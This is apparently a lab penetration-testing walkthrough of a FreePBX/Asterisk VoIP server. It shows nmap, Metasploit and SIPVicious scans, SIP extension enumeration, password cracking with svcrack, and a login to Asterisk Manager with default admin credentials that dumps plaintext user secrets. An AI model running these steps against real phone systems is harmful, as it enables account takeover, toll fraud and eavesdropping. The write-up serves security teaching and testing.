VOIP Pentesting
Target: 192.168.108.196
Goal: understand VoIP-related security issues
VoIP Overview
VoIP (Voice over IP) refers to carrying voice over an IP network. A VoIP deployment can be as simple as point-to-point voice between two users or as large as a carrier-grade infrastructure, and it can offer customers and end users new kinds of communication services. Most VoIP solutions use several protocols: at least one for signaling and one for carrying the encoded voice. The two most common signaling protocols today are H.323 and SIP (Session Initiation Protocol); their role is to manage session setup, handover and teardown for VoIP calls.
H.323 is actually the collective name for a group of protocols defined by the ITU (International Telecommunication Union); its encoding is ASN.1. H.323 has a larger installed base than SIP. The ITU's purpose in defining this suite was to make it easier to integrate VoIP with the public switched telephone network (PSTN).
SIP was defined by the IETF. Its installed base is growing rapidly, with many deployments migrating from H.323. SIP can be used not only to set up voice sessions but also to support a range of other solutions and tools, such as Instant Messaging (IM). SIP is similar in style to HTTP: it defines different methods and response codes for setting up and tearing down sessions, and it normally communicates on port 5060 (TCP/UDP). The methods and response codes are listed in the two tables below:
INVITE - initiates a new session
ACK - acknowledges the final response to an INVITE
BYE - terminates an existing session
CANCEL - cancels all pending requests
OPTIONS - queries server capabilities
REGISTER - registers a SIP location
As with HTTP, responses are grouped by code class:
SIP 1xx - informational responses
SIP 2xx - success responses
SIP 3xx - redirection responses
SIP 4xx - client request failures
RTP (Real-time Transport Protocol) carries the encoded voice data. RTP's control channel is provided by RTCP (Real-time Control Protocol), which consists mainly of QoS (Quality of Service) information (latency, packet loss rate, noise, etc.). RTP runs over UDP; source and destination ports can be allocated dynamically (UDP/5004 is common). RTP does not itself handle QoS; that is left to existing capabilities of the network (packet/frame marking, classification and queuing).
One key difference between a traditional PBX voice network and a VoIP solution: in a VoIP network the RTP stream does not pass through any voice switching equipment. The encoded RTP packets are exchanged directly between the two endpoints (that is, RTP goes phone to phone).
VoIP (Voice over IP) Attacks
VoIP networks are exposed to many kinds of attack, mainly because of the following facts: VoIP users must use multiple interfaces and protocols, the network's quality of service is critical to VoIP communication, and a complete VoIP system is usually quite complex.
- Attacking VoIP through TFTP
- Attacking through SIP users
- Attacking through SIP vulnerabilities
Probe the host for open TCP/UDP ports and gather service information for each port.
[nixawk@core share]$ nmap -A -n -p 22,53,80,111,907,3306,4445,5038 192.168.108.196
Starting Nmap 6.47 ( http://nmap.org ) at 2015-02-09 02:43 UTC
Nmap scan report for 192.168.108.196
Host is up (0.00066s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 1f:e2:e8:9e:2c:f8:31:39:36:f7:1d:aa:77:5e:ac:76 (DSA)
|_ 2048 38:a4:9d:29:8a:11:9d:e1:13:5d:5e:6d:76:a6:63:76 (RSA)
53/tcp open domain dnsmasq 2.45
| dns-nsid:
|_ bind.version: dnsmasq-2.45
80/tcp open http Apache httpd 2.2.3 ((CentOS))
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: FreePBX
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 904/udp status
|_ 100024 1 907/tcp status
907/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
4445/tcp open upnotifyp?
5038/tcp open asterisk Asterisk Call Manager 1.1
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.95 seconds
The scan above shows that 5038/tcp is serving Asterisk Call Manager 1.1.
Asterisk[1] is an open-source software VoIP PBX; it is a pure-software implementation that runs on Linux. Asterisk is a very full-featured application that provides many telephony functions: it can turn your x86 machine into your own switch, and it can also serve as an enterprise-grade commercial switch. What is exciting about Asterisk is that it delivers the functionality and scalability of a commercial switch within a small business's budget. You can use an old Pentium 3 computer and make your organization look like one of the world's large enterprises.
VoIP Security Tools
VoIP is mainly about voice: making calls, video and so on. Before attacking any system we first need to scan to find suitable targets. The process of locating SIP proxies or other SIP devices is called SIP scanning. The relevant security testing tools are introduced below.
SIPVicious - http://code.google.com/p/sipvicious/
[nixawk@core sipvicious-0.2.8]$ ls -l
total 144
-rw-r--r-- 1 nixawk nixawk 8359 Dec 10 2012 Changelog
drwxr-xr-x 3 nixawk nixawk 4096 Feb 9 03:10 libs
drwxr-xr-x 3 nixawk nixawk 4096 Dec 10 2012 man1
-rw-r--r-- 1 nixawk nixawk 1212 Dec 10 2012 README.md
drwxr-xr-x 3 nixawk nixawk 4096 Dec 10 2012 resources
-rwxr-xr-x 1 nixawk nixawk 23831 Dec 10 2012 svcrack.py
-rwxr-xr-x 1 nixawk nixawk 7026 Dec 10 2012 svcrash.py
-rwxr-xr-x 1 nixawk nixawk 25185 Dec 10 2012 svmap.py
-rwxr-xr-x 1 nixawk nixawk 12956 Dec 10 2012 svreport.py
-rwxr-xr-x 1 nixawk nixawk 29001 Dec 10 2012 svwar.py
-rw-r--r-- 1 nixawk nixawk 367 Dec 10 2012 THANKS
-rw-r--r-- 1 nixawk nixawk 80 Dec 10 2012 TODO
Scanning with Metasploit works as follows:
msf auxiliary(enumerator) > use auxiliary/scanner/sip/options
msf auxiliary(options) > show options
Module options (auxiliary/scanner/sip/options):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target address range or CIDR identifier
RPORT 5060 yes The target port
THREADS 10 yes The number of concurrent threads
TO nobody no The destination username to probe at each host
msf auxiliary(options) > set RHOSTS 10.1.255.24
RHOSTS => 10.1.255.24
msf auxiliary(options) > run
[*] Sending SIP UDP OPTIONS requests to 10.1.255.24->10.1.255.24 (1 hosts)
[*] 10.1.255.24:5060 udp SIP/2.0 200 OK: {"Server"=>"Asterisk PBX 1.6.2.11", "Allow"=>"INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
svmap
A SIP scanner. It scans a range of target IPs and identifies SIP servers, or identifies which ports on a host speak SIP.
svwar
Finds the working extension lines on a PBX. A working extension is one that can be registered. It also tells you whether an extension requires authentication.
svcrack
A password cracker for SIP authentication, effective against both registrars and proxy servers. The current cracking modes support numeric ranges and dictionary files.
svreport
Manages sessions; results can be exported as pdf, xml, csv and plain text.
svcrash
Responds to SIP messages from svwar and svcrack in a way that causes old versions of those tools to crash.
svmap
By default svmap scans port 5060; use the -p option to specify a different port.
[nixawk@core sipvicious-0.2.8]$ python ./svmap.py -p 5038 192.168.108.196
WARNING:root:found nothing
-s name saves the session data under that name; -d enables debug mode (shows more detailed output).
[nixawk@core sipvicious-0.2.8]$ python svmap.py -d -p 5060 -m INVITE -s victim001 192.168.108.196
('192.168.108.196', 5060)
SIP/2.0 100 Trying
Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060
From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333
To: "sipvicious"<sip:100@1.1.1.1>
Call-ID: 662015948337022026087404
CSeq: 1 INVITE
Server: Asterisk PBX 1.6.2.11
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
Contact: <sip:100@192.168.108.196>
Content-Length: 0
('192.168.108.196', 5060)
SIP/2.0 503 Service Unavailable
Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060
From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333
To: "sipvicious"<sip:100@1.1.1.1>;tag=as11f7ed52
Call-ID: 662015948337022026087404
CSeq: 1 INVITE
Server: Asterisk PBX 1.6.2.11
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
X-Asterisk-HangupCause: Unknown
X-Asterisk-HangupCauseCode: 20
Content-Length: 0
('192.168.108.196', 5060)
SIP/2.0 503 Service Unavailable
Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060
From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333
To: "sipvicious"<sip:100@1.1.1.1>;tag=as11f7ed52
Call-ID: 662015948337022026087404
CSeq: 1 INVITE
Server: Asterisk PBX 1.6.2.11
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
X-Asterisk-HangupCause: Unknown
X-Asterisk-HangupCauseCode: 20
Content-Length: 0
('192.168.108.196', 5060)
SIP/2.0 503 Service Unavailable
Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060
From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333
To: "sipvicious"<sip:100@1.1.1.1>;tag=as11f7ed52
Call-ID: 662015948337022026087404
CSeq: 1 INVITE
Server: Asterisk PBX 1.6.2.11
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
X-Asterisk-HangupCause: Unknown
X-Asterisk-HangupCauseCode: 20
Content-Length: 0
('192.168.108.196', 5060)
SIP/2.0 503 Service Unavailable
Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060
From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333
To: "sipvicious"<sip:100@1.1.1.1>;tag=as11f7ed52
Call-ID: 662015948337022026087404
CSeq: 1 INVITE
Server: Asterisk PBX 1.6.2.11
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
X-Asterisk-HangupCause: Unknown
X-Asterisk-HangupCauseCode: 20
Content-Length: 0
| SIP Device | User Agent | Fingerprint |
--------------------------------------------------------------
| 192.168.108.196:5060 | Asterisk PBX 1.6.2.11 | disabled |
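The method and response-code tables above, and the INVITE responses that svmap captured, can be checked with a small parser. This is an added example, not part of the original write-up and not SIPVicious code. The two sample responses are re-typed from the capture above with CRLF line endings; the parser also treats 5xx and 6xx as the server-error and global-failure classes, which sit alongside the four classes listed earlier. fingerprint() returns exactly what an unauthenticated scanner learns from the Server and Allow headers, which is why PBX operators change the advertised banner (the useragent option in sip.conf) and rate-limit OPTIONS/INVITE probes from unknown sources.

```python
# Added example: parse SIP responses like the ones svmap printed above and
# classify them by response class. Not code from the write-up or SIPVicious.
from dataclasses import dataclass
from typing import Dict, List

RESPONSE_CLASSES = {
    1: "provisional",     # 1xx, e.g. 100 Trying
    2: "success",         # 2xx, e.g. 200 OK
    3: "redirection",     # 3xx
    4: "client error",    # 4xx, e.g. 401/404/407
    5: "server error",    # 5xx, e.g. 503 Service Unavailable (seen above)
    6: "global failure",  # 6xx
}

# Constructed sample input: two responses re-typed from the svmap capture.
SAMPLE_RESPONSES = [
    "SIP/2.0 100 Trying\r\n"
    "Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060\r\n"
    'From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333\r\n'
    'To: "sipvicious"<sip:100@1.1.1.1>\r\n'
    "Call-ID: 662015948337022026087404\r\n"
    "CSeq: 1 INVITE\r\n"
    "Server: Asterisk PBX 1.6.2.11\r\n"
    "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO\r\n"
    "Supported: replaces, timer\r\n"
    "Contact: <sip:100@192.168.108.196>\r\n"
    "Content-Length: 0\r\n\r\n",
    "SIP/2.0 503 Service Unavailable\r\n"
    "Via: SIP/2.0/UDP 192.168.108.113:5060;branch=z9hG4bK-2950888152;received=192.168.108.113;rport=5060\r\n"
    'From: "sipvicious"<sip:100@1.1.1.1>;tag=6330613836636334313363340133303231333439333333\r\n'
    'To: "sipvicious"<sip:100@1.1.1.1>;tag=as11f7ed52\r\n'
    "Call-ID: 662015948337022026087404\r\n"
    "CSeq: 1 INVITE\r\n"
    "Server: Asterisk PBX 1.6.2.11\r\n"
    "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO\r\n"
    "Supported: replaces, timer\r\n"
    "X-Asterisk-HangupCause: Unknown\r\n"
    "X-Asterisk-HangupCauseCode: 20\r\n"
    "Content-Length: 0\r\n\r\n",
]


@dataclass
class SipResponse:
    status: int
    reason: str
    headers: Dict[str, str]  # header names are lower-cased

    @property
    def response_class(self) -> str:
        return RESPONSE_CLASSES.get(self.status // 100, "unknown")

    @property
    def allowed_methods(self) -> List[str]:
        # The Allow header is what svmap/Metasploit print as "Allow"
        allow = self.headers.get("allow", "")
        return [m.strip() for m in allow.split(",") if m.strip()]


def parse_response(raw: str) -> SipResponse:
    """Parse one SIP response: status line plus headers (any body is ignored)."""
    text = raw.replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    lines = head.split("\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3 or parts[0] != "SIP/2.0" or not parts[1].isdigit():
        raise ValueError(f"not a SIP/2.0 status line: {lines[0]!r}")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()
    return SipResponse(int(parts[1]), parts[2], headers)


def fingerprint(raw_responses: List[str]) -> dict:
    """Summarise what an unauthenticated scanner learns from the responses alone."""
    servers, methods, statuses = set(), set(), []
    for raw in raw_responses:
        resp = parse_response(raw)
        statuses.append(resp.status)
        if "server" in resp.headers:
            servers.add(resp.headers["server"])
        methods.update(resp.allowed_methods)
    return {
        "server_banners": sorted(servers),
        "methods": sorted(methods),
        "status_codes": statuses,
        "classes": [RESPONSE_CLASSES.get(s // 100, "unknown") for s in statuses],
    }


if __name__ == "__main__":
    for key, value in fingerprint(SAMPLE_RESPONSES).items():
        print(f"{key}: {value}")
```

Run it as a script to see the banner, method list and status classes for the two captured responses; feed parse_response() the raw datagrams from a pcap or a SIP trace to apply the same classification to real traffic.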
msf auxiliary(options) > show options
Module options (auxiliary/scanner/sip/options):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS 192.168.108.195 yes The target address range or CIDR identifier
RPORT 5060 yes The target port
THREADS 10 yes The number of concurrent threads
TO nobody no The destination username to probe at each host
msf auxiliary(options) > run
[*] Sending SIP UDP OPTIONS requests to 192.168.108.195->192.168.108.195 (1 hosts)
[*] 192.168.108.195:5060 udp SIP/2.0 404 Not Found: {"Server"=>"Asterisk PBX 1.8.13.1~dfsg1-3+deb7u3", "Allow"=>"INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(options) > set RHOSTS 192.168.108.196
RHOSTS => 192.168.108.196
msf auxiliary(options) > run
[*] Sending SIP UDP OPTIONS requests to 192.168.108.196->192.168.108.196 (1 hosts)
[*] 192.168.108.196:5060 udp SIP/2.0 200 OK: {"Server"=>"Asterisk PBX 1.6.2.11", "Allow"=>"INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
svreport
After an svmap.py run completes, the session data can be exported in various formats.
[nixawk@core sipvicious-0.2.8]$ python svreport.py export -f txt -o victim001.txt -s victim001
[nixawk@core sipvicious-0.2.8]$ cat victim001.txt
| Host | User Agent | Resolved |
------------------------------------------------------------------
| 192.168.108.196:5060 | Asterisk PBX 1.6.2.11 | [not available] |
svwar
-D scans with the default extension list; use -e to specify your own.
Looking at the telephone world, every phone or answering party is a user, and every extension has a username; this is the phone system's user identification mechanism (called caller ID). It is the same as user accounts on a computer: each user is a phone or an extension, and because some privileged information (such as voicemail) has to be accessed, this username mechanism matters even more. These usernames are typically 4-6 digit numbers and form one half of the authentication credentials; the other half is a 4-6 digit PIN. If you did not appreciate the value of extension numbers before, you should now. Below we explore the value of enumerating this information. Beyond the traditional manual approach and the automated war-dialing mentioned earlier, we can also enumerate VoIP extensions simply by observing a server's responses. Remember that SIP is an easily readable request/response protocol, so it is easy to analyze and to interact with a server. SIP gateways follow the same basic specification, but that does not mean they are written the same way. Dealing with Asterisk and SIP Express Router (two open-source SIP gateways), we will see that each leaks information in its own way.
- Asterisk REGISTER user enumeration
- SIP Express Router OPTIONS user enumeration
[nixawk@core sipvicious-0.2.8]$ python ./svwar.py -D -m INVITE 192.168.108.196
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
WARNING:TakeASip:extension '100' probably exists but the response is unexpected
WARNING:TakeASip:extension '100' probably exists but the response is unexpected
| Extension | Authentication |
------------------------------
| 201 | reqauth |
| 200 | reqauth |
| 2000 | reqauth |
| 102 | reqauth |
| 100 | weird |
| 101 | reqauth |
svcrack
Crack the password of the corresponding line. The Asterisk Call Manager default administrative credentials are:
Username: admin
Password: amp111
[nixawk@core sipvicious-0.2.8]$ python ./svcrack.py -u 2000 -d ~/share/pwd.txt 192.168.108.196
ERROR:ASipOfRedWine:We got an unknown response
| Extension | Password |
---------------------------
| 2000 | password123 |
The Asterisk Call Manager default account is admin/amp111; try logging in with it.
C:\Users\nfs>ncat -v 192.168.108.196 5038
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Connected to 192.168.108.196:5038.
Asterisk Call Manager/1.1
action: login
username: admin
secret: amp111
Response: Success
Message: Authentication accepted
action: command
command: sip show users
Response: Follows
Privilege: Command
Username Secret Accountcode Def.Context ACL NAT
100 from-internal Yes Always
101 s3cur3 from-internal Yes Always
102 letmein123 from-internal Yes Always
201 secret123 from-internal Yes Always
200 quit3s3curE123 from-internal Yes Always
2000 password123 from-internal Yes Always
SIP Clients
jitsi - https://jitsi.org/index.php/Main/Download
ekiga - http://ekiga.org/
Now we can use account 2000 to call account 101.
SIP Commands
Commonly used SIP-related commands are listed below:
action: command
command: core show help
! Execute a shell command
ael reload Reload AEL configuration
ael set debug {read|tokens|mac Enable AEL debugging flags
agi dump html Dumps a list of AGI commands in HTML format
agi exec Add AGI command to a channel in Async AGI
agi set debug [on|off] Enable/Disable AGI debugging
agi show commands [topic] List AGI commands or specific help
cdr show status Display the CDR status
channel originate Originate a call
channel redirect Redirect a call
channel request hangup Request a hangup on a given channel
cli check permissions Try a permissions config for a user
cli reload permissions Reload CLI permissions config
cli show aliases Show CLI command aliases
cli show permissions Show CLI permissions
config list Show all files that have loaded a configuration file
config reload Force a reload on modules using a particular configuration file
core abort shutdown Cancel a running shutdown
core clear profile Clear profiling info
core ping taskprocessor Ping a named task processor
core restart gracefully Restart Asterisk gracefully
core restart now Restart Asterisk immediately
core restart when convenient Restart Asterisk at empty call volume
core set debug channel Enable/disable debugging on a channel
core set {debug|verbose} Set level of debug/verbose chattiness
core show applications [like|d Shows registered dialplan applications
core show application Describe a specific dialplan application
core show calls [uptime] Display information on calls
core show channels [concise|ve Display information on channels
core show channel Display information on a specific channel
core show channeltypes List available channel types
core show channeltype Give more details on that channel type
core show codecs [audio|video| Displays a list of codecs
core show codec Shows a specific codec
core show config mappings Display config mappings (file names to config engines)
core show file formats Displays file formats
core show file version [like] List versions of files used to build Asterisk
core show functions [like] Shows registered dialplan functions
core show function Describe a specific dialplan function
core show help Display help list, or specific help on a command
core show hints Show dialplan hints
core show hint Show dialplan hint
core show image formats Displays image formats
core show license Show the license(s) for this copy of Asterisk
core show profile Display profiling info
core show settings Show some core settings
core show switches Show alternative switches
core show sysinfo Show System Information
core show taskprocessors List instantiated task processors and statistics
core show threads Show running threads
core show translation [recalc] Display translation matrix
core show uptime [seconds] Show uptime information
core show version Display version info
core show warranty Show the warranty (if any) for this copy of Asterisk
core stop gracefully Gracefully shut down Asterisk
core stop now Shut down Asterisk immediately
core stop when convenient Shut down Asterisk at empty call volume
core waitfullybooted Wait for Asterisk to be fully booted
dahdi destroy channel Destroy a channel
dahdi restart Fully restart DAHDI channels
dahdi set dnd Sets/resets DND (Do Not Disturb) mode on a channel
dahdi set hwgain Set hardware gain on a channel
dahdi set swgain Set software gain on a channel
dahdi show cadences List cadences
dahdi show channels [trunkgrou Show active DAHDI channels
dahdi show channel Show information on a channel
dahdi show status Show all DAHDI cards status
dahdi show version Show the DAHDI version in use
database del Removes database key/value
database deltree Removes database keytree/values
database get Gets database value
database put Adds/updates database value
database show Shows database contents
database showkey Shows database contents
devstate change Change a custom device state
devstate list List currently known custom device states
dialplan add extension Add new extension into context
dialplan add ignorepat Add new ignore pattern
dialplan add include Include context in other context
dialplan debug Show fast extension pattern matching data structures
dialplan reload Reload extensions and *only* extensions
dialplan remove extension Remove a specified extension
dialplan remove ignorepat Remove ignore pattern from context
dialplan remove include Remove a specified include from context
dialplan set chanvar Set a channel variable
dialplan set extenpatternmatch Use the Old extension pattern matching algorithm.
dialplan set extenpatternmatch Use the New extension pattern matching algorithm.
dialplan set global Set global dialplan variable
dialplan show chanvar Show channel variables
dialplan show globals Show global dialplan variables
dialplan show Show dialplan
dnsmgr refresh Performs an immediate refresh
dnsmgr reload Reloads the DNS manager configuration
dnsmgr status Display the DNS manager status
features reload Reloads configured features
features show Lists configured features
file convert Convert audio file
group show channels Display active channels with group(s)
http show status Display HTTP server status
iax2 provision Provision an IAX device
iax2 prune realtime Prune a cached realtime lookup
iax2 reload Reload IAX configuration
iax2 set debug {on|off|peer} Enable/Disable IAX debugging
iax2 set debug jb {on|off} Enable/Disable IAX jitterbuffer debugging
iax2 set debug trunk {on|off} Enable/Disable IAX trunk debugging
iax2 set mtu Set the IAX systemwide trunking MTU
iax2 show cache Display IAX cached dialplan
iax2 show callnumber usage Show current entries in IP call number limit table
iax2 show channels List active IAX channels
iax2 show firmware List available IAX firmware
iax2 show netstats List active IAX channel netstats
iax2 show peer Show details on specific IAX peer
iax2 show peers List defined IAX peers
iax2 show provisioning Display iax provisioning
iax2 show registry Display IAX registration status
iax2 show stats Display IAX statistics
iax2 show threads Display IAX helper thread info
iax2 show users [like] List defined IAX users
iax2 test losspct Set IAX2 incoming frame loss percentage
iax2 unregister Unregister (force expiration) an IAX2 peer from the registry
indication add Add the given indication to the country
indication remove Remove the given indication from the country
indication show Display a list of all countries/indications
keys init Initialize RSA key passcodes
keys show Displays RSA key information
local show channels List status of local channels
logger mute Toggle logging output to a console
logger reload Reopens the log files
logger rotate Rotates and reopens the log files
logger set level {DEBUG|NOTICE Enables/Disables a specific logging level for this console
logger show channels List configured log channels
manager reload Reload manager configurations
manager set debug [on|off] Show, enable, disable debugging of the manager code
manager show command Show a manager interface command
manager show commands List manager interface commands
manager show connected List connected manager interface users
manager show eventq List manager interface queued events
manager show users List configured manager users
manager show user Display information on a specific manager user
meetme {lock|unlock|mute|unmut Execute a command on a conference or conferee
meetme list [concise] List all or one conference
mfcr2 call files [on|off] Enable/Disable MFC/R2 call files
mfcr2 set blocked Reset MFC/R2 channel forcing it to BLOCKED
mfcr2 set debug Set MFC/R2 channel logging level
mfcr2 set idle Reset MFC/R2 channel forcing it to IDLE
mfcr2 show channels [group|con Show MFC/R2 channels
mfcr2 show variants Show supported MFC/R2 variants
mfcr2 show version Show OpenR2 library version
mgcp audit endpoint Audit specified MGCP endpoint
mgcp reload Reload MGCP configuration
mgcp set debug {on|off} Enable/Disable MGCP debugging
mgcp show endpoints List defined MGCP endpoints
minivm list accounts List defined mini-voicemail boxes
minivm list templates List message templates
minivm list zones List zone message formats
minivm reload Reload Mini-voicemail configuration
minivm show settings Show mini-voicemail general settings
minivm show stats Show some mini-voicemail statistics
mixmonitor {start|stop} Execute a MixMonitor command
module load Load a module by name
module reload Reload configuration
module show [like] List modules and info
module unload Unload a module by name
moh reload Reload MusicOnHold
moh show classes List MusicOnHold classes
moh show files List MusicOnHold file-based classes
no debug channel Disable debugging on channel(s)
parkedcalls show List currently parked calls
phoneprov show routes Show registered phoneprov http routes
pri set debug {on|off|0|1|2} s Enables PRI debugging on a span
pri set debug file Sends PRI debug output to the specified file
pri show debug Displays current PRI debug settings
pri show spans Displays PRI Information
pri show span Displays PRI Information
pri show version Displays libpri version
queue add member Add a channel to a specified queue
queue reload {parameters|membe Reload queues, members, queue rules, or parameters
queue remove member Removes a channel from a specified queue
queue reset stats Reset statistics for a queue
queue set penalty Set penalty for a channel of a specified queue
queue show Show status of a specified queue
queue {pause|unpause} member Pause or unpause a queue member
queue show rules Show the rules defined in queuerules.conf
realtime destroy Delete a row from a RealTime database
realtime load Used to print out RealTime variables.
realtime store Store a new row into a RealTime database
realtime update Used to update RealTime variables.
realtime update2 Used to test the RealTime update2 method
rtcp set debug {on|off|ip} Enable/Disable RTCP debugging
rtcp set stats {on|off} Enable/Disable RTCP stats
rtp set debug {on|off|ip} Enable/Disable RTP debugging
say load [new|old] Set or show the say mode
sip notify Send a notify packet to a SIP peer
sip prune realtime [peer|all] Prune cached Realtime users/peers
sip qualify peer Send an OPTIONS packet to a peer
sip reload Reload SIP configuration
sip set debug {on|off|ip|peer} Enable/Disable SIP debugging
sip set history {on|off} Enable/Disable SIP history
sip show {channels|subscriptio List active SIP channels or subscriptions
sip show channelstats List statistics for active SIP channels
sip show channel Show detailed SIP channel info
sip show domains List our local SIP domains
sip show history Show SIP dialog history
sip show inuse List all inuse/limits
sip show mwi Show MWI subscriptions
sip show objects List all SIP object allocations
sip show peers List defined SIP peers
sip show peer Show details on specific SIP peer
sip show registry List SIP registration status
sip show sched Present a report on the status of the sched queue
sip show settings Show SIP global settings
sip show tcp List TCP Connections
sip show users List defined SIP users
sip show user Show details on specific SIP user
sip unregister Unregister (force expiration) a SIP peer from the registry
sla show stations Show SLA Stations
sla show trunks Show SLA Trunks
ss7 block cic Blocks the given CIC
ss7 block linkset Blocks all CICs on a linkset
ss7 set debug {on|off} linkset Enables SS7 debugging on a linkset
ss7 show linkset Shows the status of a linkset
ss7 show version Displays libss7 version
ss7 unblock cic Unblocks the given CIC
ss7 unblock linkset Unblocks all CICs on a linkset
stun set debug {on|off} Enable/Disable STUN debugging
timing test Run a timing test
transcoder show Display DAHDI transcoder utilization.
udptl set debug {on|off|ip} Enable/Disable UDPTL debugging
ulimit Set or show process resource limits
voicemail reload Reload voicemail configuration
voicemail show users List defined voicemail boxes
voicemail show zones List zone message formats
action: command
command: agi show commands
Response: Follows
Privilege: Command
Dead Command Description
No answer Answer channel
Yes asyncagi break Interrupts Async AGI
No channel status Returns status of the connected channel.
Yes database del Removes database key/value
Yes database deltree Removes database keytree/value
Yes database get Gets database value
Yes database put Adds/updates database value
Yes exec Executes a given Application
No get data Prompts for DTMF on a channel
Yes get full variable Evaluates a channel expression
No get option Stream file, prompt for DTMF, with timeout.
Yes get variable Gets a channel variable.
No hangup Hangup the current channel.
Yes noop Does nothing.
No receive char Receives one character from channels supporting it
No receive text Receives text from channels supporting it
No record file Records to a given file
No say alpha Says a given character string
No say digits Says a given digit string
No say number Says a given number
No say phonetic Says a given character string with phonetics
No say date Says a given date
No say time Says a given time
No say datetime Says a given time as specfied by the format given
No send image Sends images to channels supporting it
No send text Sends text to channels supporting it
No set autohangup Autohangup channel in some time
No set callerid Sets callerid for the current channel
No set context Sets channel context
No set extension Changes channel extension
No set music Enable/Disable Music on hold generator
No set priority Set channel dialplan priority
Yes set variable Sets a channel variable
No stream file Sends audio file on channel
No control stream file Sends audio file on channel and allows the listner to control the
No tdd mode Toggles TDD mode (for the deaf)
Yes verbose Logs a message to the asterisk verbose log
No wait for digit Waits for a digit to be pressed
No speech create Creates a speech object
No speech set Sets a speech engine setting
Yes speech destroy Destroys a speech object
No speech load grammar Loads a grammar
Yes speech unload grammar Unloads a grammar
No speech activate grammar Activates a grammar
No speech deactivate grammar Deactivates a grammar
No speech recognize Recognizes speech
No gosub Execute a dialplan subroutine
Example 1 of the commands above:
action: command
command: config list
Response: Follows
Privilege: Command
core /etc/asterisk/asterisk.conf
cdr_csv /etc/asterisk/cdr.conf
cdr /etc/asterisk/cdr.conf
chan_dahdi /etc/asterisk/chan_dahdi.conf
chan_dahdi /etc/asterisk/chan_dahdi_additional.conf
chan_dahdi /etc/asterisk/chan_dahdi_general.conf
chan_dahdi /etc/asterisk/chan_dahdi_groups.conf
enum /etc/asterisk/enum.conf
pbx_config /etc/asterisk/extensions.conf
pbx_config /etc/asterisk/extensions_additional.conf
pbx_config /etc/asterisk/extensions_custom.conf
pbx_config /etc/asterisk/extensions_override_freepbx.conf
features /etc/asterisk/features.conf
features /etc/asterisk/features_applicationmap_additional.conf
features /etc/asterisk/features_applicationmap_custom.conf
features /etc/asterisk/features_featuremap_additional.conf
features /etc/asterisk/features_featuremap_custom.conf
features /etc/asterisk/features_general_additional.conf
features /etc/asterisk/features_general_custom.conf
pbx_config /etc/asterisk/globals_custom.conf
chan_iax2 /etc/asterisk/iax.conf
chan_iax2 /etc/asterisk/iax_additional.conf
chan_iax2 /etc/asterisk/iax_custom.conf
chan_iax2 /etc/asterisk/iax_custom_post.conf
chan_iax2 /etc/asterisk/iax_general_additional.conf
chan_iax2 /etc/asterisk/iax_general_custom.conf
chan_iax2 /etc/asterisk/iax_registrations.conf
chan_iax2 /etc/asterisk/iax_registrations_custom.conf
indications /etc/asterisk/indications.conf
logger /etc/asterisk/logger.conf
